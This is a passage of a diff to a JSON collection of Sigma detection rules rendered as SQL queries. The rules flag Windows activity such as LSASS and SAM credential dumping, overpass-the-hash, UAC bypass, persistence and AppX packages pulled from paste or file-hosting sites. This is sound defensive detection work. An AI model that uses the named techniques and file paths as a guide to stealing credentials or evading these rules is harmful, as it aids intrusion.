ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_susp_failed_logon_source.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Device Installation Blocked", - "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects an installation of a device that is forbidden by the system policy", - "author": "frack113", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" - ], - "filename": "win_security_device_installation_blocked.yml" - }, - { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "ScreenConnect Temporary Installation Artefact", + "id": "fec96f39-988b-4586-b746-b93d59fd1922", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\')" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_screenconnect_artefact.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Writing Local Admin Share", + "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "status": "experimental", + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.lateral_movement", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_writing_local_admin_share.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_terminalservices_rdp_ngrok.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "New Firewall Rule Added In Windows Firewall Exception List", - "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "status": "experimental", - "description": "Detects when a rule has been added to the Windows Firewall exception list", - "author": "frack113", - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2004' AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], - "filename": "win_firewall_as_add_rule.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", - "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "status": "experimental", - "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", - "author": "frack113", + "title": "Startup Folder File Write", + "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", + "status": "test", + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "falsepositives": [ + "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2006' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" ], - "filename": "win_firewall_as_delete_rule.yml" + "filename": "file_event_win_startup_folder_file_write.yml" }, { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1105" + ], + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Deployment Of The AppX Package Was Blocked By The Policy", - "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by the local computer policy", - "author": "frack113", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Rare cases of administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_policy_block.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious AppX Package Installation Attempt", - "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Legitimate AppX packages not signed by MS used part of an enterprise" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Deployment AppX Package Was Blocked By AppLocker", - "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by AppLocker policy", - "author": "frack113", - "tags": [ - "attack.defense_evasion" - ], + "description": "Detects windows executables that writes files with suspicious extensions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" ], - "filename": "win_appxdeployment_server_applocker_block.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "Potential Malicious AppX Package Installation Attempts", - "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", - "status": "experimental", - "description": "Detects potential installation or installation attempts of known malicious appx packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_mal_appx_names.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Uncommon AppX Package Locations", - "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE 